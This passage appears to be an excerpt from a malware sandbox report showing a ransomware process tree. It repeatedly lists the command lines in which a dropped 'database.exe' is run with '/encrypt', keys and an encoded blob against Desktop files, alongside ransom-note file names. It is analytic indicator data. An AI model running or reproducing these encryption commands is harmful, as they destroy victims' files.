                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ExitGrant.svgz.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FILES ENCRYPTED.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FindRepair.vsdm.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RemoveSet.mp2v.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ResetCopy.mpeg.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RestoreExpand.fon.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RevokeHide.vsx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowPush.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowSync.rle.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\StartRemove.mpeg3.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\sWiVkIcd-unycY7aQ.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TestUndo.ppt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TUKJxPJj-ELwXopms.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\UnblockRestore.jtx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\uWPwQFnd-mjxwmm85.[[email protected]].gif"
  5⤵
  PID:7956
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WriteResolve.dib.id-DA208E5B.[[email protected]].gamma.gif"
  5⤵
  PID:7964
• C:\Windows\SysWOW64\shell.exe
